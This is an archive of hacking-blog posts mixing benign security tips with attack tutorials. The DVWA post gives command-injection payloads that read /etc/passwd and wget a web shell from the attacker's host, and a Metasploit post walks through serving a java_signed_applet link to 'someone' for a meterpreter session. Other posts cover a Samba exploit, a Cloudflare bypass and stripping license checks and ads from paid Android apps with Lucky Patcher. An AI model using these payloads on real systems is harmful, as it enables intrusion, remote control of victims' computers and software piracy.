Showing posts with label HOW TO. Show all posts
Showing posts with label HOW TO. Show all posts

Sunday, 21 December 2014

Good Practices In Database Security



Databases are often the targets of security attacks by cyber criminals. Databases that hold all the security related information, passwords and financial details of users are what these attackers are looking to profit off. That is why database security is an incredibly complex topic that can be covered in elaborate detail. Get in touch with your remote DBA now.

However here are a few of the best practices in database security that will help businesses.


   1. Keep the database and the web servers separate.

Usually when the entire web related software is been installed, the database is automatically made. For the sake of convenience the database is made on the same server where the software has been loaded which is the web server. However this opens the doors for a security breach because then hackers will only need a single point of entry. If they are able to make their way past the security for the web server then all the data stored will be at their mercy.

This is why the database should be stored separately on server that is further protected by a firewall and not with the web server. It is a more intricate but well needed procedure. To know more visit - http://www.remotedba.com/


   2. File encryption

Just storing the database on a separate server is not enough to ward off persistent attacks. Encrypt all the files that are being stored. The stored files of the web software have the information that will enable it to connect to the databases. If you store the data in plain text files like a lot of people then they will provide the data that the hacker needs to get to the sensitive information.

It is not just the files that need to be encrypted. Encrypt the backup files too incase there is an internal attack.


   3. WAF

Use WAFs or web application firewalls. It isn’t true that the web server protection is completely separate or irrelevant to the database. A proper WAF will protect your website from cross site script vulnerabilities, vandalism and also potential SQL injection attacks. If SQL queries can be prevented from being injected by a criminal then the firewall will be successful in keeping all the sensitive information which is stored in a database away from unwanted attention and attacks.


   4. Current patches

This is one thing that a lot of web administrators like remote DBA fall short. Web sites which have a lot of third party apps, elements, widgets, plug-ins and other add-ones become easy targets to something that could have been patched on time.


   5. Less third party apps

Try and reduce the number of third party applications being used. While it is understandable to use user-interactive widgets and other content that makes websites attractive, any app that accesses the database is always a weak point which can be exploited. Unless it is required don’t use third party apps. Remember that these are made by programmers who then stop support after a while.


   6. No shared servers

If your database has highly sensitive information then don’t use a shared server if you can avoid it. It will be cheaper and easier. However remember that you are putting all your important data at the hands of someone else. In case you can’t avoid it, do a keen review of all their security protocol.


   7. Security controls

Put in security controls on your database. Check your controls and ensure that they have been enabled even though it is automatically enabled by most databases these days.


About the author

Trisha Ray is a database administrator for the past five years. She is also a remote DBA. Trisha loves cycling on the weekends.


Thursday, 1 August 2013

How To Prevent Credit Card Identity Theft While Abroad

When you’re traveling overseas, you’re automatically putting your identity at risk, primarily due to your credit card. The risk isn’t severe enough that you should avoid travel altogether, but it does warrant some extra precaution and a reasonable amount of attention that you should be aware of during your trip.

Since identity theft is common and difficult to protect against in other countries, you need to be a bit more proactive in terms of protecting your credit card. Identity thieves will specifically target foreigners, especially Americans because of their perceived vulnerability.

They’ll assume that you’re not paying attention and that you aren’t prepared, but if you prove them wrong, then you’ve already won the war.



So, how can you be prepared and get the jump start on potential identity thieves?

While you can never guarantee the safety of your credit card 100-percent (even on American soil), taking these simple steps can help to ensure that you’ve got the deck stacked in your favor.

Here are a few things you can do to help prevent identity theft while travelling abroad:

1. Notify your credit card company ahead of time -- Your credit card company is on your side. It might not feel like that at all times, but when it comes to identity theft, you’ve got a willing (and powerful) ally in your credit card company, so be sure to use them.

Give them a call before your trip and give them a quick “readers digest” version of where you’re going to be and what you’ll be buying. Not only will this prevent your credit from getting unnecessarily deactivated, but it will also help your credit card company know when and where to flag certain purchases if something does go wrong.

2. Cover up when entering your PIN number -- It seems obsessive and maybe even rude, but when you’re making a purchase in public and you have to enter your PIN number, feel free to be discreet.

If someone looking over your shoulder can get your PIN number, it’ll make you a prime target for identity theft and in turn will make life much easier for those targeting you.

3. Photocopy your credit card -- Make a copy of the front and back of your card and leave it with a trusted friend or family member before you go. This will make the process of cancelling the card easier, in the event that it does get stolen. Chances are that this won’t be an issue, but if your card does get swiped, it’ll allow you to expedite the cancellation process.

4. Checking expenses online or on your smartphone -- Make sure that you have your bank’s app, or some other method of tracking purchases and checking your balance on your laptop or smartphone.



If you’re able to monitor your purchases on a daily basis, you’ll also be able to pick up on inconsistencies or purchases that you might not have made that will show up on your expense report.

Don’t get overly obsessed with checking it, but just review your purchases each night to make sure you don’t find anything unexpected.

Staying Sharp


Overall, staying sharp and keeping your wits about you when you’re traveling abroad will be enough to keep the topic of identity theft off the table. In addition, taking these extra steps will help you to protect against the most typical forms of credit card theft and fraud.

In the off chance that you do experience some issues with your credit card while traveling abroad, there are plenty of resources for credit help that will be able to assist you.
The more you can ensure a smooth and uneventful trip overseas, the better off you’re going to be, especially when dealing with your finances.


About The Author:

Marcela De Vivo is a freelance writer and internet entrepreneur from Southern California whose writing covers everything on technology, home security, gaming and marketing. She keeps her computer well-protected through the use of various programs.


Saturday, 6 July 2013

How to get or get rid of iOS 7 Beta?

To the delight of fanatic Apple users, the giant company released the beta version of the brand new and advanced iOS 7. But before you jump to test the rivers, we should offer a word of caution that although Apple has a reputation for releasing the ever so polished beta versions, the latest iOS 7 might just be battery hungry and a kin of bug-bunny. Hence, do not use it for your daily devices.



Quite the claims of certain developers that if you download the iOS 7, there is no turning back, we would like you to know that you can easily restore back to iOS 6, if you dint so much like the iOS 7. Read below if you wish to know the bullet proof way to upgrade to or downgrade from the iOS 7.

Installing iOS 7

What you require?
  • Before upgrading the system to iOS 7, you would need an access to iOS developer account
  • A fifth generation iPod Touch, or iPhone 5, 4S or 4
  • The model number of the device and it’s UDID – unique device identifier
  • Computer with the latest update of iTunes installed
  • IPSW file of iOS 7 beta
  • iOS 6 IPSW file, if you require restoring a stable version
How to install iOS 7 beta?



Log in to the iOS developer account and download the install files required for the process. Note: only grab those files which are required for your specific device and model number. The iOS 7 beta will be packaged as .dmg file, up for download; also, it will be wise to download a stable version of iOS 6 simultaneously. The installation requires you to register the UDID lest the download won’t work.
Now, open the .dmg file of iOS 7. It should swell itself automatically if you are a Mac user. The Windows users are required to extract the .jpsw file residing inside the .dmg one.
Once through, connect the device with computer and if an automatic launch does not take place, access it by the iPhone dialog in iTunes. Also, at this stage perform a backup manually by clicking “Back Up Now” as the installation will wipe off the storage of the device, and the backup would be required to restore the same.
If you have followed this far, now only the installation process is left. If you are a Mac user, just press the Option key and click “Restore iPhone”. Windows users should press the Shift key instead, and open the iOS 7 .jpsw file extracted earlier. Click Restore, when the system asks for a confirmation for restoring the devices. This might take some time, so be patient.
Lastly, after the installation and the restarting of your phone, you will be given the option to set your phone anew or restore an existing backup. If you want to restore the backup, stay connected to iTunes and access the backup created earlier.



Downgrading back to iOS 6



Now, if the new iOS 7 keeps giving you an uncomfortable itch, each time you unlock the phone or open the devices, you can easily change it back to iOS 6. Here’s how:
…Before we begin, are you certain?
There is a limitation with trying to downgrade the system back to iOS 6 and we would like you to be certain prior to initiating the process. The downgrading will only get you to the latest version update of iOS, i.e. 6.1.4 for iPhone 5 users and 6.1.3 for iPhone 4S. Besides, you will not be able to use iOS 7 backup on an iOS 6 device, and would not be able to recover any jailbreaks. If you still want to continue, read ahead:
How to downgrade to iOS 6 from iOS 7
Start with downloading the most recent firmware file from Our Downloads and save it on a place easy to access, perhaps the desktop. Then launch iTunes on your Mac or PC.
Now, plug in your device and put it in DFU mode. Ensure that the screen is not connected to iTunes but is black instead, which confirms the DFU more. You will get a pop up message saying “the device can't be used until it's restored.” Click Ok and continue.
Now, press hold of the Alt / Option key (or the Shift key for the PC users) and click on Restore iPhone in iTunes. Reach the firmware file saved in first step and click open. Now, let iTunes take care of the rest and if you have done everything right, you will get back to your iOS 6 in no time.
Done successfully with upgrading or downgrading the iOS? Share your experiences with us in the comments below.

About The Author:

Rick Brown is an acclaimed tech blogger, who provides consulting services to new bie entrepreneurs for iPhone Apps Development services - Mobiers.com. He simply suggests his clients to hire iPhone developers from expert agencies for high-end development.


Monday, 10 June 2013

How to Make a .ONION Website Using Tor Network

Not a lot of people know about .onion websites, not many people actually use it. .ONION websites are used by people who want to stay anonymous. In addition, .onion websites are the first layer of the Deep Web. Which is basically described in the picture bellow


As many websites say, the Deep Web is about 96% of the WWW content. It's full of illegal things, for example, drug dealers, private information sellers, and child p0rn websites. Plus, some people say that you can find hit-men and assassins there! 

You can search about the deep web if you want to know more,  but as an advise, don't access it much. This tutorial is just for educational purposes, and for you to know about this.

First of All let's start with the requirements:
  1. Tor Installed (Windows) OR Downloaded and extracted (Linux)
  2. A Server like Apache. (Windows users are advised to use XAMPP and Linux users, you can simply install Apache2 on your machine.)
  3. Text Editor.
If you have all the above, then you're ready to go!

First of all run Tor to make sure it's working:

If it's working, then that's good you're good to go for the next step.
Stop and close Tor for now,

Then Open the following file:

WINDOWS:
C:\Tor Browser\Data\Tor\torrc
Linux:
open the extracted folder from tor > Data > Tor > torrc

Then add the following text at the bottom of the file:

WINDOWS:

# Hidden Service

HiddenServiceDir C:\Users\UserName\tor_service

HiddenServicePort 80 127.0.0.1:80

Linux:

# Hidden Service

HiddenServiceDir /root/tor_service

HiddenServicePort 80 127.0.0.1:80

You can change from root to any user you are using.


Now make the directory in the path you added in torrc (tor_service)


Now start you apache server and make sure it's working!


If it's working, start Tor!
Check Log Message to check that there was no error starting it!


No errors! Now check the folder that you created "tor_service" You will find two files!

Open the file "hostname" and you will find you .onion link!!


This link is now working and ONLY ACCESSIBLE for Tor users!
Want to test it? Open tor, and access it!



Tuesday, 14 May 2013

C0mmand Executi0n Tut0rial - DVWA Low & Medium Lever

************THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY*************

Hello guys,
Today I'll be showing you how to exploit command execution vulnerabilities. I will perform this attack on DVWA (Damn Vulnerable Web App) It can be downloaded and installed easily. But for those who are following my tutorials, installing Metasploitable-Linux is enough, because it's installed in it; just open the IP in your browser and click on DVWA.
The default username and password for it are:
User: admin
Password: password

Command execution can be the most dangerous venerability you can find in a website/server. It will allow you to simply backconnect with netcat, or upload your shell in a matter of seconds!
Command execution will allow you to execute commands on the target server whether it's Windows or Linux.

So lets start exploiting!

Lets start with the Low level in DVWA.

The source is:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

$target = $_REQUEST[ 'ip' ];

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}
?>

As you can see in the code above, it didn't run anything to check if your input is an IP, or if it has '&&' '||' or ';', and those characters means AND, OR, and the sumicolon means the end of a command.
So lets try to run something like:
google.com && ls

The output will be like the image bellow:



Note that a list of files were printed after the ping result. That's what the command "ls" do! So it's working, now lets have more fun!

Execute this command:
google.com && uname -a && id && cat /etc/passwd



Well, it's time to own the system now! The commands are executing with no errors. Lets try to get a shell on their system; for that we need a shell in .txt on a different server. I have a shell on my localhost, so lets use that:



All you have to do is run wget to get the shell, then change the name from SecurityGeeks.txt to SecurityGeeks.php
this command will do it all:

google.com && wget YOUR_IP_ADDRESS/SecurityGeeks.txt && mv SecurityGeeks.txt SecurityGeeks.php
wget will get the shell, mv will change the name. You can get your IP address by running "ipconfig" in windows CMD or "ifconfig" in linux terminal.

So lets try!



Command ran successfully, lets check if our shell is there!

The shell will be in the same directory you're in, so just add /YourShellName.php to the link!



Nice! Now you have full, and easier to use shell access! and Also you get root access if you followed my Metasploit tutorials you'll know how!

OK! now we got the low lever, lets switch to the medium level in DVWA and try to get the same access we got now!

In medium level, they added a little bit of security to the code, but its not enough.
The code in medium is:

<?php

if( isset( $_POST[ 'submit'] ) ) {

$target = $_REQUEST[ 'ip' ];

// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);

$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}
}

?>

As you can see in the code above, they banned the characters ';' and '&&' but it's not really enough because we have another option which is '||'

But it's a little different with this one, because it means OR. So the shell doesn't always execute it when there is another command before it. So the way to use this one will be different than before, we wont add "google.com" then '&& COMMAND' but we will put '|| COMMAND' without anything before it!

Let's just give it a try and see if it's working!



the command 'ls' is working, everything is going fine!
But now, you'll need to use one ONLY command each time.

Hope you enjoyed it!


Wednesday, 8 May 2013

How To Bypass vBulletin Forums Cloudflare - New Method


Hello guys,
Another video tutorial by Foloox on how to bypass cloudflare. New cool methods that I've never used. :)
The tutorial is on his channel, please subscribe to his channel!

The script used in the second method can be found here:
http://pastie.securitygeeks.net/47



The video is AVAILABLE in HD, just change the quality!
Enjoy! ^_^


Tuesday, 7 May 2013

How To Remove The License Verification From Android App/Games Using Lucky Patcher



Hello guys, Today I'm going to show you how to remove the license verification from apps and games. License Verification can be found in all paid apps, to check if you actually bought the app/game or downloaded it from somewhere else. Well, today we will remove that license verification and use paid apps for free, or most of them.

For this tutorial we will be using AfterMath XHD, which is a paid game on Google Play, as a demo.

For this tutorial we need:

  • Rooted Android Device
  • Lucky Patcher (Can Be Downloaded here)
  • A Paid game to try to remove the License Verification from it

So, before I remove the license from the game, the game doesn't start because our license is invalid
As you can see in the picture bellow:


Now launch Lucky Patcher, it WILL need root permissions so let it grant the root permissions. When it opens it shows the list of all the apps with Google Ads, License Verification, and some more. (You can see my tutorial about remove Google ads from apps HERE)


Click on the app or the game you want to patch, a screen with some information about the game will show, like the picture bellow:



Click on "Open Menu Of Patches" in the bottom of the page:


Click on "Remove License Verification" a list of patches will show


The patch you chose will be already selected for you, so just click on Apply, it will start processing


Now all you have to do is wait until it finishes and give you the result:


You're done! Now launch the app you patched, and it will work just fine!


This process can patch many apps, including famous ones like SPB Shell 3D! And the game above is one of top paid games in Google Store too.
Have fun, and try patching the apps you want!
Enjoy!


Saturday, 4 May 2013

How to Add Exploits to Metasploit Framework in 3 steps


Hello Guys,
Today We have a Metasploit Tutorial Submitted by Foloox Csl
The video is on his channel, please subscribe to him!

The tutorial is shwoing how to add exploits to Metasploit. Sometimes we find exploits on exploit-db for Metasploit, in order to be able to use those exploits, we have to follow the steps in the video!



The Video IS available in HD, just change the Qualitly!


Monday, 29 April 2013

Attacking Metasploitable - Samba Sever - Metasploit Tutorial



Hello guys,
Here is the first video of my Metasploitable attacking videos!
In this attack we exploited Samba server (which is vulnerable).

First thing I did was scanning the target IP with nmap, it will a slow and almost complete scan.
I got the IP from Metasploitable it self by running "ifconfig"

Then after detecting samba server in the target, launch Metasploit, search for the keyword "samba"
A list of exploits will show, all you have to do is type:

use exploit/path/to/exploit

After you use that command, type "show options" to see what that exploit needs, and see the options you have.

when you set your hosts, and ports; type "exploit" And that will run the exploit.

After we exploited the target, we got root access, which is exactly what I needed!

Video:

Vimeo Link: https://vimeo.com/65082563


Sunday, 28 April 2013

How To Remove Google Ads From Android Apps - Lucky Patcher


Hello guys, Today I have an Android video tutorial for you!
We all hate Ads on apps, they're disturbing, and we don't really want to pay just to remove them.. So today I will show you how to remove them from your apps
For this tutorial you need:
1. A Rooted Android Device
2. Lucky Patcher (Download HERE)
3. An App With Google Ads

As usual the video is AVAILABLE IN HD, and its best played in HD!
Vimeo Link:


How to install Backtrack and Metasploitable on Vmware - Metasploit

Hello guys,
Today I will show you how to install Backtrack 5 and Metasploitable-Linux on Vmware,
This Tutorial is just to get you guys ready to my Metasploit videos that I will release very soon.

First of all, you should download both Metasploitable-Linux (Our Target) and Backtrack 5 (Our attacker)

Download Backtrack for HERE
Download Metasploitable from HERE
Download VMWARE Player from HERE
When you download Backtrack, make sure you downloaded for 32-BIT Architecture.
I prefer KDE, which I will be using, and it always works on vmware. (GNOME give some graphics errors sometimes)



Backtrack Installation

After you download backtrack, open vmware, and click on "Create A New Virtual Machine"



Then check "Installer disc image file (.iso), and browse for your backtrack image file, and open it.


Now click on Next, and choose "Linux" as the Guest operating system, and "Ubuntu" as the virsion


Click on "Next", Choose a name for your OS, any name is OK!

Now click on "Next" again, now it's your turn, you choose what disk size you want for it, and then click on Next again, then you're done! UNLESS, you want to edit some of the settings, and CPU & RAM for your OS, you can do by clicking on "Customize Hardware"





Now Play your virtual machine, wait for it until it shows a terminal saying "root@bt:~#"
type "startx" and click enter.
You're done!

Metasploitable-Linux Installation

Metasploitable is a vulnerable OS, it has many vulnerabilities.. We will use that OS as a target to pwn it..
When you download Metasploitable, it will be downloaded as a .zip file, extract it, and you will see a file with the extension .vmx


All you have to do to install this OS, is to double click on it.. vmware will ask you if you you copied the virtual machine, or moved it, click on I moved it!

And you're done!

Hope you liked it! =)



Saturday, 27 April 2013

Spy camera detector - Things You Can Do To Protect Your Privacy

Privacy is extremely important for every individual to have and protect, but it is becoming
more and more difficult to protect your privacy with today’s invasive technology. It seems
that wherever you go, people can encroach on your privacy by stealing confidential personal
and financial information, or by recording you with video cameras, cell phones, and even spy
cameras that you can’t detect. So how do you take steps to ensure that you keep your valuable
privacy intact and that others do not steal your information or film you without your knowledge
or consent? While you shouldn’t walk around feeling paranoid all of the time, you will be much
more likely to protect your privacy if you follow these suggestions.

Monitor Credit Reports

One of the most important ways to protect not only your privacy but your identity as well is to
monitor your credit reports regularly and vigilantly. You can receive a copy of your credit report
on an annual basis for free, so don’t worry about the cost. If you monitor your credit reports
regularly then you will be able to catch fraudulent activity that is happening under your social
security number before it becomes a bigger issue.

Keep Your Phone Password-Protected

Smart phones contain so much confidential information, and if you lose your phone then others
could easily access that information. To keep this from happening, make sure you password-
protect your smart phone and any other type of cell phone that you may own.

Purchase a Hidden Camera Detector

You never know when you may find yourself in a situation where someone tries to film you
secretly and without your consent. If you find yourself in a situation where you think this may
happen, you should invest in a spy camera detector that will alert you to any hidden cameras
that may be around you. This will help you make sure that you don’t do or say anything that
could incriminate you later if you were secretly being filmed on a spy camera.

Choose Strong Computer Passwords

Computer hackers are out in full force lately, and they aren’t likely to back down anytime soon.
To keep all of the confidential information on your computer safe, it is important that you
choose strong passwords for all of your various accounts that you access online. Even though it
can be a pain to try and remember multiple passwords, make sure that you don’t use the same
password for all of your important accounts. You should also make sure that you always have a

strong antivirus and antispyware program installed to protect your information at all times.

Always Be Cautious

Although you don’t want to be paranoid all the time, you should always be cautious about who
you give personal information to. If you don’t know why someone is asking for specific, private
information then simply don’t give it to them. If someone ever calls you or emails you claiming
they are from your bank or other financial institution, make sure you ask them to provide
information to identify you, instead of giving them personal information that will identify you.
After all, if they are really your bank they should know who you are when they call you or email
you.

If you follow these helpful suggestions you should be able to successfully protect your privacy
from those who would like to exploit it.


About The Author:

This is a guest post by Laura Russell, a guest writer from Brickhousesecurity.com,
a site that offers home security solutions with their highly trusted spy cams. They
also offer GPS tracking, hidden cameras and PC monitoring assistance.


Thursday, 25 April 2013

How To Hack Windows 8 Using Metasploit - java_signed_applet

Hello guys,

Today I have my first Metasploit tutorial! We will be pentesting Windows 8 (My PC) Using Metasploit on Kali, inside a virtual machine.
So lets get started!

First thing you need to do is open Metasploit by running "msfconsole" in your terminal.


After metasploit loads, type this command:

use multi/browser/java_signed_applet

Like the picture bellow:

Now You have to set you local port, in this exploit its called SRVPORT. The default port is 8080, you can set it to any port you want.
Just run the command bellow:


set SRVPORT [Port number]

Change [Port number to anything you like, I used 1337.


Now to change the path to the exploit, we can set the URIPATH to anything we want.
We can leave all the settings as it is, but it will look a little bit ugly, things like:
0.0.0.0:8080/Kgn3Tn

Changing them will make people accept it more easily, and it's more fun!

To change the URIPATH run the following command:

set URIPATH /

Like the picture bellow:


Now run the command "exploit"

The server will start on the port, and the path you set.

All you have to do now, is send the IP to someone to open. When they open it they'll see a screen like this:


If they ran it, a window will open, Check "I accept the risk and want to run this application" then click on "Run"


As soon as you run it, metasploit will start a meterpreter session to the target PC, and you'll have full access to the target PC!

Session Opened:

System info:

Hope you like it!
Here is the video tutorial, performing this attack!

Video available in HD, just change the quality! Vimeo Link: https://vimeo.com/64841698